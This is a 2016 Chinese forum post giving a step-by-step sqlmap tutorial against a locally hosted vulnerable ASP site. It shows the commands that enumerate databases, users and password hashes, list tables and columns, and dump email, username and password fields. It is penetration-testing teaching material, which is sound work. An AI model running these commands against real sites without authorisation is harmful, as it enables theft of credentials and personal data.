首页
社区
课程
招聘
[旧帖] [分享]渗透测试工具sqlmap教程 0.00雪花
发表于: 2016-7-8 13:08 2090

[旧帖] [分享]渗透测试工具sqlmap教程 0.00雪花

2016-7-8 13:08
2090
测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150
注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

教程开始:

1、检测注入点是否可用
C:\Python27\sqlmap>python sqlmap.py -u http://192.168.1.150/products.asp?id=134
参数:
-u:指定注入点url
结果:
图片1.jpg
图片2.jpg

注入结果展示:
(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query
(2)web服务器系统为windows 2003 or XP
(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0
(4)数据库类型为:SQLSERVER 2000
其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch  

2、暴库
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs  
参数:
--dbs:dbs前面有两条杠,请看清楚。
结果:
图片3.jpg

结果显示该sqlserver中共包含7个可用的数据库。

3、web当前使用的数据库
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db  
图片4.jpg

4、web数据库使用账户
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user  

图片5.jpg

5、列出sqlserver所有用户
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users  
图片6.jpg

6、数据库账户与密码
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords  

图片7.jpg

7、列出数据库中的表
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables  
参数:
-D:指定数据库名称
--tables:列出表
结果:

图片8.jpg

结果体现共列出了34张表。

8、列出表中字段
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns  
参数:
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段
结果:
图片9.jpg

结果显示该userb表中包含了23条字段。
9、暴字段内容
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump  
参数:
-C :指定要暴的字段
--dump:将结果导出
结果:
图片12.jpg

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump  
参数:
--start:指定开始的行
--stop:指定结束的行
此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。
结果如下:
图片13.jpg

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//